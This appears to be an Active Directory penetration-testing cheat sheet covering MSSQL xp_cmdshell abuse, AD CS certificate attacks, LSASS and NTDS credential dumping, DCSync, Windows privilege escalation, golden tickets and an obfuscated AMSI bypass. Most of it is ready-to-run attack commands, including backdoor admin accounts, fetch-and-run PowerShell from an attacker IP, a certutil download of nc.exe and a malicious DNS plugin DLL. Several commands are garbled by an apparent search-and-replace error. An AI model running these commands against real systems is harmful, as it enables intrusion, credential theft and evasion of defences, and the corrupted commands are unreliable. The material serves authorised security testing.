Get-SQLInstanceDomain | Get-SQLConnectionTest
Get-SQLInstanceDomain | Get-SQLServerInfo
Invoke-SQLAudit -Verbose

Privesc - xp_cmdshell to SYSTEM

sql
-- Enable xp_cmdshell (if SA or sysadmin)
-- Server-level configuration change that persists until reverted; sp_configure changes are recorded in the SQL Server error log
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Execute commands (run as the SQL Server service account)
-- NOTE(review): `net administrator hacker ...` looks like a global search/replace artifact; that command string is unverified as printed
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'net administrator hacker P@ss123 /add';
EXEC xp_cmdshell 'net localgroup Administrators hacker /add';
EXEC xp_cmdshell 'powershell -enc BASE64REVSHELL';

-- Capture NTLM hash via UNC path (Responder listening) — makes the SQL service account authenticate outbound; egress filtering of SMB is the mitigation
EXEC master..xp_dirtree '\\10.10.14.1\share';
EXEC xp_fileexist '\\10.10.14.1\share\test';

-- Read files
EXEC xp_cmdshell 'type C:\Users\Administrator\Desktop\root.txt';

-- Upload file (certutil download is a widely signatured LOLBin pattern)
EXEC xp_cmdshell 'certutil -urlcache -f http://10.10.14.1/nc.exe C:\Windows\Temp\nc.exe';

Privesc - Impersonation (EXECUTE AS)

sql
-- List logins the current login holds IMPERSONATE permission on
SELECT distinct b.name FROM sys.server_permissions a
INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE';

-- Impersonate sa (switch execution context; REVERT returns to the original login)
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER; SELECT IS_SRVROLEMEMBER('sysadmin');
EXEC xp_cmdshell 'whoami';

-- Or impersonate another login
EXECUTE AS LOGIN = 'dbadmin';

Privesc - Linked Servers

sql
-- Enumerate linked servers (a linked server configured with a fixed privileged login is the usual weakness)
EXEC sp_linkedservers;
SELECT * FROM sys.servers;

-- Execute commands on linked server (EXEC ... AT runs the string remotely; RPC Out must be enabled on the link)
EXEC ('xp_cmdshell ''whoami'' ') AT [LinkedServer\SQLINSTANCE];
SELECT * FROM OPENROWSET('SQLOLEDB', 'Server=LinkedServer;Trusted_Connection=yes', 'SELECT SYSTEM_USER');

-- Chain multiple links (quotes are doubled once per nesting level)
EXEC ('EXEC (''xp_cmdshell ''''whoami'''' '') AT [Server3]') AT [Server2];

Privesc - PowerUpSQL Automated

powershell
# Automated escalation (PowerUpSQL); the second form also follows database ownership chaining
Invoke-SQLEscalatePriv -Verbose
Get-SQLInstanceDomain | Invoke-SQLAuditPrivDbChaining -Verbose

# Exec cmd on found instance
Get-SQLInstanceDomain | Invoke-SQLOSCmd -Command "whoami" -RawResults

HTTP / HTTPS (Ports 80, 443, 8080, 8443)

AD Web Enumeration

bash
# Detect AD-related endpoints (fingerprint, then directory brute force with ASP/ASPX extensions)
whatweb http://10.10.10.10
gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x asp,aspx,php
feroxbuster -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x asp,aspx

# AD CS endpoints (ADCS Web Enrollment); HEAD requests only — a 401 with NTLM/Negotiate challenge indicates the enrollment site exists
curl -I http://10.10.10.10/certsrv/
curl -I http://10.10.10.10/certsrv/certfnsh.asp
curl -I http://10.10.10.10/CertSrv/mscep/mscep.dll
curl -I http://10.10.10.10/certsrv/certcarc.asp

Privesc - NTLM Relay HTTP to LDAP

bash
# Capture NTLM from internal web page and relay to LDAP (LDAPS target; channel binding on the DC defeats this relay)
impacket-ntlmrelayx -t ldaps://10.10.10.10 -wh fakewpad.domain.local --add-computer EvilPC --computer-password 'P@ss!'

AD CS / Certificate Services (Ports 80, 443, 636)

Certipy Enumeration

bash
# Discover CAs and templates (read-only LDAP/RPC enumeration; -vulnerable flags ESC conditions, -json saves for later review)
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -stdout
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -vulnerable -stdout
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -json -output adcs

# With NetExec
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M adcs
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M adcs -o SERVER=ca.domain.local
powershell
# Certify.exe (Windows): same template audit; `cas` lists certificate authorities
.\Certify.exe find /vulnerable
.\Certify.exe find /vulnerable /enabled /enrolleeSuppliesSubject
.\Certify.exe cas

Privesc - ESC1 (Enrollee Supplies Subject)

bash
# Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + Client Auth EKU + Domain Users enrollment
# Mitigation side: remove the enrollee-supplies-subject flag or require manager approval on such templates; the CA logs every issued request
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'VulnTemplate' -upn administrator@domain.local -dc-ip 10.10.10.10
# Authenticate with the issued certificate (PKINIT) to obtain a TGT and the account's NT hash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
powershell
# Windows (Certify): request with an alternate name, convert the PEM to PFX, then PKINIT with Rubeus
.\Certify.exe request /ca:DC01.domain.local\CA-NAME /template:VulnTemplate /altname:administrator
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx
# NOTE(review): `/administrator:administrator` looks like a global search/replace artifact; the switch name is unverified as printed
.\Rubeus.exe asktgt /administrator:administrator /certificate:admin.pfx /getcredentials /ptt

Privesc - ESC2 (Any Purpose EKU)

bash
# ESC2: template with the Any Purpose EKU (or no EKU) — request, then authenticate with the result
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'ESC2-Template' -dc-ip 10.10.10.10
certipy auth -pfx user.pfx -dc-ip 10.10.10.10

Privesc - ESC3 (Enrollment Agent)

bash
# Step 1: Obtain an Enrollment Agent certificate
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'EnrollmentAgent' -dc-ip 10.10.10.10
# Step 2: Use the agent to request a cert for admin (restricting enrollment agents on the CA is the mitigation)
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'User' -on-behalf-of 'domain.local\administrator' -pfx agent.pfx -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

Privesc - ESC4 (WriteProperty on Template)

bash
# Modify template then ESC1 (-save-old stores the original template configuration for the restore step below)
certipy template -u administrator@domain.local -p P@ssw0rd -template 'TargetTemplate' -save-old -dc-ip 10.10.10.10
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'TargetTemplate' -upn administrator@domain.local -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10
# Restore original template — template edits are directory writes under the Configuration partition; audit them
certipy template -u administrator@domain.local -p P@ssw0rd -template 'TargetTemplate' -configuration TargetTemplate.json -dc-ip 10.10.10.10

Privesc - ESC6 (EDITF_ATTRIBUTESUBJECTALTNAME2)

bash
# Check flag on CA (certutil runs on Windows; the registry EditFlags value holds EDITF_ATTRIBUTESUBJECTALTNAME2)
certutil -config "ca.domain.local\CA-NAME" -getreg CA\PolicyModules\CertificateAuthority_MicrosoftDefault.Policy\EditFlags
certipy find -u administrator@domain.local -p P@ssw0rd -dc-ip 10.10.10.10 -stdout | grep -i esc6

# Exploit (any template) — the SAN comes from the request attributes, so a plain User template suffices; clearing the flag on the CA is the fix
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'User' -upn administrator@domain.local -dc-ip 10.10.10.10

Privesc - ESC7 (ManageCA / ManageCertificates)

bash
# If ManageCA - grant yourself ManageCertificates (officer) and enable the SubCA template
certipy ca -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -add-officer administrator -dc-ip 10.10.10.10
certipy ca -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -enable-template 'SubCA' -dc-ip 10.10.10.10

# Request - Issue - Retrieve (14 is a sample request ID; the pending request is approved with the officer right, then fetched)
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'SubCA' -upn administrator@domain.local -dc-ip 10.10.10.10
certipy ca -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -issue-request 14 -dc-ip 10.10.10.10
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -retrieve 14 -dc-ip 10.10.10.10
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

Privesc - ESC8 (NTLM Relay to AD CS HTTP)

bash
# Check HTTP endpoint (web enrollment reachable over plain HTTP with NTLM is the ESC8 precondition)
# Mitigation side: disable NTLM on the enrollment site, require HTTPS with Extended Protection for Authentication
curl -I http://ca.domain.local/certsrv/certfnsh.asp

# Terminal 1: Relay to ADCS
impacket-ntlmrelayx -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Terminal 2: Force DC auth (the DC's machine account is relayed to the CA, yielding a DC certificate)
python3 PetitPotam.py 10.10.14.1 DC01.domain.local
python3 printerbug.py domain.local/administrator:P@ssw0rd@DC01.domain.local 10.10.14.1
powershell
# Use the captured certificate — NOTE(review): `/administrator:DC$` looks like a global search/replace artifact; the switch name is unverified as printed
.\Rubeus.exe asktgt /administrator:DC$ /certificate:BASE64_CERT /ptt
bash
# Linux: PKINIT with the DC certificate, then DCSync with the resulting ticket
certipy auth -pfx dc.pfx -dc-ip 10.10.10.10
# NOTE(review): `-no-P@ssw0rd` looks like a global search/replace artifact; verify the flag as printed
impacket-secretsdump -k -no-P@ssw0rd domain.local/DC$@DC01.domain.local

Privesc - ESC9 / ESC10 (No Security Extension / Weak Mapping)

bash
# ESC9: certificate issued without the SID security extension — remains usable for authentication after the account password changes
certipy req -u administrator@domain.local -p P@ssw0rd -ca 'CA-NAME' -template 'ESC9-Template' -dc-ip 10.10.10.10
certipy auth -pfx user.pfx -dc-ip 10.10.10.10

# Shadow Credentials (ESC10 / GenericWrite) — writes msDS-KeyCredentialLink on the target; a directory write that change auditing can surface
certipy shadow auto -u administrator@domain.local -p P@ssw0rd -account targetuser -dc-ip 10.10.10.10

NFS (Port 2049)

NFS Enumeration and Exploitation

bash
# Enumeration: list exports and their permissions
nmap -p 2049 --script nfs-showmount,nfs-ls,nfs-statfs 10.10.10.10
showmount -e 10.10.10.10

# Mount shares (requires root locally; vers=2 only for legacy servers)
mkdir /mnt/nfs
mount -t nfs 10.10.10.10:/share /mnt/nfs -o nolock
mount -t nfs -o vers=2 10.10.10.10:/ /mnt/nfs

# Privesc: no_root_squash - create SUID
# Only works when the export has no_root_squash and is not mounted nosuid on the target; root_squash (the default) is the mitigation
# Check /etc/exports on the target
cat /etc/exports
cp /bin/bash /mnt/nfs/bash
chmod +s /mnt/nfs/bash
# From target: /tmp/bash -p - root
# NOTE(review): the target-side path depends on where the export lives on the server (here the share root), not necessarily /tmp

Credential Dumping (Multi-Service)

LSASS Dump

powershell
# Mimikatz direct (requires SeDebugPrivilege; reading LSASS memory is the canonical credential-theft signal for EDR)
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
sekurlsa::tspkg
sekurlsa::dpapi
sekurlsa::ekeys

# Bypass LSA Protection — `!+` loads the mimidrv kernel driver; a driver load from a non-standard path is itself a high-confidence alert
!+
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords

# Dump LSASS without mimikatz (via Task Manager - Create Dump)
# Analyze the dump offline:
pypykatz lsa minidump lsass.dmp
.\Mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords"

# Comsvcs.dll (LOLBin) — MiniDump takes a PID, so this form only works from PowerShell
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id lsass.dmp full
# Or via PowerShell with Sysinternals procdump
$id = (Get-Process -Name lsass).Id
.\procdump.exe -accepteula -ma $id lsass.dmp

SAM / NTDS.dit

powershell
# SAM (local accounts) — hive exports require administrator; SYSTEM holds the boot key needed to decrypt SAM/SECURITY
reg save HKLM\SAM C:\sam.bak
reg save HKLM\SYSTEM C:\system.bak
reg save HKLM\SECURITY C:\security.bak
bash
# On attacker: parse the exported hives offline (LOCAL = no network target)
impacket-secretsdump -sam sam.bak -security security.bak -system system.bak LOCAL
powershell
# NTDS.dit via VSS (shadow copy) — the live file is locked, so copy it from a snapshot; shadow-copy creation is logged and worth alerting on for DCs
vssadmin list shadows
vssadmin create shadow /for=C:
# HarddiskVolumeShadowCopy1 is a sample; use the device path printed by the create command
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit C:\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.bak
bash
# Analyze NTDS.dit offline (SYSTEM hive supplies the boot key)
impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lmhash:nthash LOCAL
impacket-secretsdump -ntds ntds.dit -system system.bak LOCAL -outputfile domain_hashes

DCSync

bash
# From Linux (Impacket) - requires DCSync rights (Replicating Directory Changes / ...All)
# Detection side: directory replication requests (event 4662 with the replication GUIDs) from a source that is not a DC
impacket-secretsdump domain.local/administrator:P@ssw0rd@DC01.domain.local -just-dc
# Single account only — NOTE(review): `-just-dc-administrator` looks like a global search/replace artifact; verify the flag as printed
impacket-secretsdump domain.local/administrator:P@ssw0rd@DC01.domain.local -just-dc-administrator krbtgt
impacket-secretsdump domain.local/administrator:P@ssw0rd@DC01.domain.local -just-dc -outputfile all_hashes

# Pass-the-Hash for DCSync
impacket-secretsdump domain.local/administrator@DC01.domain.local -hashes :NTLMHASH -just-dc
powershell
# From Windows (Mimikatz) — NOTE(review): `/administrator:` looks like a global search/replace artifact; switch names are unverified as printed
lsadump::dcsync /domain:domain.local /administrator:krbtgt
lsadump::dcsync /domain:domain.local /administrator:Administrator
lsadump::dcsync /domain:domain.local /all /csv

# Add DCSync rights if GenericAll/WriteDACL on domain (ACE change on the domain head — audit it)
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity compromised_user -Rights DCSync

DPAPI

powershell
# List DPAPI credential blobs (cmd.exe syntax; /ah shows hidden entries)
dir %appdata%\Microsoft\Credentials\ /ah
dir %localappdata%\Microsoft\Credentials\ /ah

# Dump with Mimikatz (<SID> and <GUIDMASTERKEY> are placeholders for the user's SID and master-key file name)
dpapi::cred /in:"%appdata%\Microsoft\Credentials\CREDFILEHASH"
# /rpc asks the DC for the master-key backup — requires domain admin rights
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<GUIDMASTERKEY>" /rpc
dpapi::cache
# NOTE(review): duplicate of the earlier dpapi::cred line (kept as printed)
dpapi::cred /in:"%appdata%\Microsoft\Credentials\CREDFILEHASH"

# Windows Credential Manager (cmdkey lists saved credentials; LaZagne harvests stored secrets)
cmdkey /list
.\LaZagne.exe windows
.\LaZagne.exe all

Windows Local Privilege Escalation

Initial Enumeration

powershell
# System info (whoami /priv lists the token privileges checked in the sections below)
systeminfo
whoami /all
whoami /priv
# NOTE(review): `net administrator %username%` looks like a global search/replace artifact, and %username% is cmd.exe syntax; unverified as printed
net administrator %username% /domain
net localgroup administrators

# PowerUp - automated check (downloads and runs the script in memory)
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/privesc.ps1')
Invoke-AllChecks

# WinPEAS
.\winPEASany.exe
.\winPEASx64.exe fast

# Watson (kernel vulns)
.\Watson.exe

# Seatbelt (audit)
.\Seatbelt.exe -group=all -full
.\Seatbelt.exe CredEnum WindowsEventForwarding LAPS

Privesc - SeImpersonatePrivilege / SeAssignPrimaryTokenPrivilege

powershell
# Check (SeImpersonatePrivilege is held by default by service accounts such as IIS/MSSQL; that is why these apply after a service compromise)
whoami /priv | findstr /i "SeImpersonatePrivilege\|SeAssignPrimaryToken"

# NOTE(review): `net administrator hacker ...` in the commands below looks like a global search/replace artifact; those payload strings are unverified as printed
# JuicyPotato (Win Server 2016 and earlier)
.\JuicyPotato.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c net administrator hacker P@ss /add && net localgroup Administrators hacker /add" -l 9999

# PrintSpoofer (Win 10 / Server 2019)
.\PrintSpoofer.exe -i -c cmd
.\PrintSpoofer.exe -c "net administrator hacker P@ss /add && net localgroup Administrators hacker /add"

# RoguePotato
.\RoguePotato.exe -r 10.10.14.1 -e "cmd.exe /c net administrator hacker P@ss /add" -l 9999

# GodPotato (Win 2012 to 2022)
.\GodPotato.exe -cmd "cmd /c net administrator hacker P@ss /add && net localgroup Administrators hacker /add"

# SweetPotato
.\SweetPotato.exe -a whoami
.\SweetPotato.exe -e EfsRpc -p "cmd.exe /c net administrator hacker P@ss /add"

Privesc - SeBackupPrivilege

powershell
# Check (Backup Operators hold this privilege by default; it bypasses file ACLs for read)
whoami /priv | findstr SeBackupPrivilege

# Dump NTDS.dit via SeBackupPrivilege
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll

Set-SeBackupPrivilege

# Create shadow copy
# NOTE(review): $shadowPath receives the whole matching findstr line, not only the device path — verify the value before relying on it
$shadowPath = (vssadmin create shadow /for=C: | findstr "shadow copy volume")
Copy-FileSeBackupPrivilege "$shadowPath\Windows\NTDS\ntds.dit" C:\temp\ntds.dit -Overwrite
reg save HKLM\SYSTEM C:\temp\system.hive
bash
# Extract on the attacker machine (offline parse of the copied NTDS.dit + SYSTEM hive)
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL

Privesc - SeDebugPrivilege

powershell
# Check (SeDebugPrivilege allows opening any process, including LSASS; Credential Guard / RunAsPPL limit what can be read)
whoami /priv | findstr SeDebugPrivilege

# Dump LSASS with SeDebug
.\Mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

# Or Procdump (full memory dump written to disk; the dump file itself is sensitive — delete it after analysis)
.\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Inject into SYSTEM processes
# Via Mimikatz: token::elevate then misc::memssp

Privesc - SeRestorePrivilege

powershell
# Replace system binary to get SYSTEM (SeRestorePrivilege bypasses file ACLs for write)
# Example: overwrite utilman.exe with cmd.exe — keep a copy of the original binary so it can be restored afterwards
.\SeRestoreAbuse.exe "C:\Windows\System32\cmd.exe"
# On RDP login screen: Windows Key + U - SYSTEM shell

Privesc - Services (Unquoted Path / Weak Permissions)

powershell
# PowerUp automated
Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose
Get-ModifiableService -Verbose

# Manual search (wmic is deprecated and absent on recent Windows builds)
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /v /i "c:\windows"
# NOTE(review): in PowerShell `sc` resolves to the Set-Content alias; the native tool is sc.exe
sc qc "VulnerableService"

# Exploit a modifiable service
Invoke-ServiceAbuse -Name "VulnerableSvc" -Command "net localgroup Administrators domain.local\administrator /add"

# Weak File Permissions - replace binary (cmd.exe-style copy; back up the original binary first)
icacls "C:\Program Files\VulnApp\app.exe"
copy evil.exe "C:\Program Files\VulnApp\app.exe" /y
sc stop VulnSvc; sc start VulnSvc

# Unquoted service path
# If path = C:\Program Files\My App\service.exe
# Plant: C:\Program.exe or C:\Program Files\My.exe
# NOTE(review): `net administrator hacker ...` looks like a global search/replace artifact; the payload string is unverified as printed
msfvenom -p windows/exec CMD="net administrator hacker P@ss /add" -f exe > "C:\Program Files\My.exe"
sc stop VulnSvc; sc start VulnSvc

Privesc - Registry (AlwaysInstallElevated)

powershell
# Check
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Both must be set to 1 (the policy should never be enabled on managed hosts — that is the fix)

# PowerUp
Get-RegistryAlwaysInstallElevated

# Exploit — NOTE(review): `net administrator hacker ...` looks like a global search/replace artifact; the payload string is unverified as printed
msfvenom -p windows/exec CMD="net administrator hacker P@ss /add && net localgroup Administrators hacker /add" -f msi > evil.msi
msiexec /quiet /qn /i evil.msi

Privesc - UAC Bypass

powershell
# FODHelper (Windows 10): auto-elevating binary reads a handler from HKCU, which the user controls
# The HKCU keys created below persist; remove them afterwards. Setting UAC to "Always notify" closes most auto-elevation bypasses
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value ""
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c start powershell.exe"
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

# Eventvwr (same idea via the mscfile handler)
New-Item "HKCU:\Software\Classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" -Name "(default)" -Value "cmd.exe"
Start-Process "C:\Windows\System32\eventvwr.exe"

# Full bypass via UACME (61 is a UACME method number)
.\Akagi64.exe 61 C:\evil.exe

Privesc - Autologon / Stored Credentials

powershell
# Autologon credentials in registry (DefaultPassword is stored in clear text when autologon is configured this way)
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

# Credentials Manager
cmdkey /list
.\LaZagne.exe windows

# Unattend.xml and sysprep (deployment answer files may hold local admin credentials; remove them after imaging)
# NOTE(review): cmd.exe's null device is `nul` — `2>null` writes errors to a file named "null"
dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>null
type C:\Windows\Panther\Unattend\Unattended.xml
type C:\Windows\System32\sysprep\sysprep.xml

Privesc - Token Impersonation

powershell
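# List available tokens (Incognito) - needs SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege
# or local admin; only tokens of users with a live session on this host appear
.\incognito.exe list_tokens -u
.\incognito.exe impersonate_token "domain.local\Administrator"

# Mimikatz - the token module takes /user:, not /administrator: (bad find/replace in the listing);
# there is no token::impersonate command, elevation is token::elevate
token::list
token::elevate /domainadmin
token::elevate /user:Administrator
# token::revert drops back to the original token

# Via Meterpreter
use incognito
list_tokens -u
impersonate_token "domain.local\\Administrator"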

Privesc - GPP / Group Policy Preferences (MS14-025)

powershell
# Search cpassword in SYSVOL - any domain user can read SYSVOL, so this needs no special rights
findstr /s /i "cpassword" \\domain.local\SYSVOL\*.xml
# PowerSploit: finds and decrypts cpassword values in Groups/Services/ScheduledTasks/etc. XML
Get-GPPPassword
bash
# From Linux (authenticated as any domain user)
impacket-Get-GPPPassword domain.local/administrator:P@ssw0rd@DC01.domain.local
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M gpp_password
netexec smb 10.10.10.10 -u administrator -p P@ssw0rd -M gpp_autologin

# Decrypt manually (publicly known AES key - Microsoft published it with MS14-025, so any
# cpassword still present in SYSVOL is effectively cleartext even after the patch)
gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

Privesc - LAPS (Local Administrator Password Solution)

powershell
# Check if LAPS is deployed (legacy LAPS attributes ms-Mcs-AdmPwd*; Windows LAPS from 2023
# uses msLAPS-* attributes instead, so these queries will miss it)
Get-DomainComputer | Where-Object {$_."ms-Mcs-AdmPwdExpirationTime" -ne $null}
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions" | findstr /i LAPS

# Read LAPS passwords (if sufficient rights - the attribute is protected by a confidential ACL,
# so only principals explicitly delegated ReadProperty on it get a value back)
Get-DomainComputer -identity target-pc -properties ms-Mcs-AdmPwd
Get-LAPSComputers
bash
# Read legacy LAPS passwords over LDAP for every computer the account may read
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd -M laps
# Restrict to one host; --kdcHost is needed when Kerberos auth is used
netexec ldap 10.10.10.10 -u administrator -p P@ssw0rd --kdcHost DC01.domain.local -M laps -o COMPUTER="target-pc"
powershell
# Identify who can read LAPS - those groups become high-value targets
Find-LAPSDelegatedGroups
# Raw ACL view: ReadProperty on the ms-Mcs-AdmPwd attribute, inherited down from each OU
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | ?{$_.ObjectAceType -like "*ms-Mcs-AdmPwd*" -and $_.ActiveDirectoryRights -match "ReadProperty"}

Privesc - Group Membership Abuse

powershell
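# Backup Operators - SeBackupPrivilege lets members copy NTDS.dit + SYSTEM off a DC for offline extraction
net localgroup "Backup Operators" /domain

# Account Operators - create accounts + add to groups (cannot touch protected groups such as DA/EA)
Get-DomainGroupMember "Account Operators"
New-ADUser -Name hacker -AccountPassword (ConvertTo-SecureString 'P@ss' -AsPlainText -Force) -Enabled $true
Add-ADGroupMember -Identity "Remote Desktop Users" -Members hacker

# Server Operators - reconfigure services on the DC; the service runs as SYSTEM on the DC
Get-DomainGroupMember "Server Operators"
# sc.exe requires a space after "binPath="; the command is "net user" (listing had "net administrator")
sc.exe \\DC01.domain.local config TrustedInstaller binPath= "cmd /c net user hacker P@ss /add"
sc.exe \\DC01.domain.local start TrustedInstaller
# Restore the original binary afterwards, otherwise Windows servicing on the DC breaks
sc.exe \\DC01.domain.local config TrustedInstaller binPath= "C:\Windows\servicing\TrustedInstaller.exe"

# DNS Admins - SYSTEM via DLL loaded by dns.exe on restart (the DC must be able to reach the share)
Get-DomainGroupMember "DNSAdmins"
dnscmd DC01.domain.local /config /serverlevelplugindll \\10.10.14.1\share\evil.dll
sc.exe \\DC01.domain.local stop dns; sc.exe \\DC01.domain.local start dns
# Cleanup: clear the plugin path so the DNS service stops loading the DLL (restarting DNS on a
# production DC interrupts name resolution for the whole domain - coordinate before doing this)
dnscmd DC01.domain.local /config /serverlevelplugindll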

Domain Privilege Escalation

Trust Escalation (Child to Parent Domain)

powershell
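# 1. DCSync in child domain for krbtgt (needs replication rights / DA in the child).
#    mimikatz takes /user:, not /administrator: (bad find/replace in the listing)
lsadump::dcsync /domain:child.domain.com /user:krbtgt

# 2. Get SID of child and parent
Get-DomainSID -Domain child.domain.com
Get-DomainSID -Domain domain.com

# 3. Golden ticket with SID History to Enterprise Admins (parent).
#    /sids puts the parent Enterprise Admins SID (RID 519) into ExtraSids; this works because
#    SID filtering is not enforced on intra-forest parent/child trusts.
kerberos::golden /user:Administrator /domain:child.domain.com /sid:S-1-5-21-CHILD-SID /krbtgt:CHILD_KRBTGT_HASH /sids:S-1-5-21-PARENT-SID-519 /ptt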

ad-pentesting-cheatsheet-a-to-z

AMSI Preparation and Evasion

AMSI Bypass (PowerShell)

powershell
# Classic bypass - flips the private amsiInitFailed flag so the current PowerShell process
# stops submitting scripts to AMSI. This exact string is itself signatured by Defender on
# patched hosts, so expect it to be blocked unless it is obfuscated or typed in pieces.
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

# Obfuscated version (copy-paste safe) - same action as above with the strings split/reordered
# so static signatures on the one-liner do not match; still only affects this process
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' )).sE`T`VaLUE( ${n`ULl},${t`RuE} )

Execution Policy Bypass

powershell
# Execution policy is not a security boundary - it only needs a per-process switch
powershell -ep bypass
# -nop: no profile; -c: inline command. Tooling is fetched over cleartext HTTP here -
# serve it over HTTPS when the path crosses anything that may inspect or tamper with traffic
powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/script.ps1')"

Reflective Script Loading

powershell
# Load a script straight into memory (nothing written to disk)
IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.1/PowerView.ps1')
# Encode in base64 to pass via cmd (-EncodedCommand expects UTF-16LE, hence Encoding.Unicode)
$cmd = 'IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.1/rev.ps1")'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd)
[Convert]::ToBase64String($bytes)
# Paste the output in place of <BASE64>
powershell -EncodedCommand <BASE64>

Network Reconnaissance

Quick Scan - AD Target Discovery

bash
# Host discovery (ICMP/ARP sweep; SMB sweep also reveals hostname, domain and signing status)
nmap -sn 10.10.10.0/24 -oG hosts.txt
crackmapexec smb 10.10.10.0/24

# Identify DCs (ports 389, 636, 88, 3268) - a host with Kerberos + LDAP + Global Catalog open is a DC
nmap -p 88,389,636,3268,3269 10.10.10.0/24
nmap -p 88 --open 10.10.10.0/24 -oG dcs.txt

# DNS enumeration - the SRV record lists every DC without scanning
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
dig _ldap._tcp.dc._msdcs.domain.local SRV

LLMNR/NBT-NS Poisoning - NTLMv2 Capture

Responder (Linux)

bash
# -w: WPAD rogue proxy, -d: answer DHCP broadcasts (injects a rogue DNS/WPAD - disruptive on a
# live network, agree scope before using it)
sudo responder -I eth0 -w -d
# -A: analyze mode, listen only - safe first step to see who is broadcasting LLMNR/NBT-NS
sudo responder -I eth0 -A
